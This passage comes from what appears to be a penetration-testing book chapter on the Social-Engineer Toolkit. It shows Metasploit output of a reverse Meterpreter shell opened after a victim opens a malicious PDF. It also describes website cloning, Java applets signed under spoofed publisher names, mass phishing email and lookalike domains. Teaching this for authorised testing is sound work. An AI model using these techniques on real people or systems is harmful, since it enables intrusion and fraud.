142
Chapter 10
The target opens the PDF thinking it’s legitimate, and his system is
instantly compromised. On the attacker’s side, you see the following:
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58087)
msf exploit(handler) >
sessions -i 1
[*] Starting interaction with 1...
meterpreter >
shell
Process 2976 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Bob\Desktop>
This example used a spear-phishing attack to target one user, but SET
can also be used to attack multiple targets using the “mass email” option.
You can also create customized templates that can be reused, instead of
using the prebuilt templates included in SET.
Web Attack Vectors
Web attack vectors are probably one of the most advanced and exciting
aspects of SET, because they are specifically crafted to be believable and
enticing to the target. SET can clone websites that look identical to trusted
sites, helping to ensure that the target will think he is visiting a legitimate site.
Java Applet
The Java applet attack is one of the most successful attack vectors in SET. The
applet itself was created by one of the SET developers, Thomas Werth. This
attack introduces a malicious Java applet that does smart browser detection
(so your exploit works) and delivers a payload to a target’s machine. The Java
applet attack is not considered a vulnerability by Java. When a target browses
the malicious site, he is presented with a warning asking if he wants to run an
untrusted Java applet. Because Java allows you to sign an applet with any name
you choose, you could call the publisher Google, Microsoft, or any other
string you choose. By editing the
set_config
file and setting
WEBATTACK_EMAIL
to
ON
, you can also incorporate mass emails with this attack.
Let’s walk through a real-world example—a penetration test performed
for a Fortune 1000 company. First, a copycat domain name, similar to that of
the actual company website, was registered. Next, the attacker scraped the
Internet looking for
@<company>.com
email addresses using the harvester
module within Metasploit. After extracting 200 email addresses from public
websites, mass emails were sent to these addresses. The attack email claimed
to be from the company’s communications department and asked the employee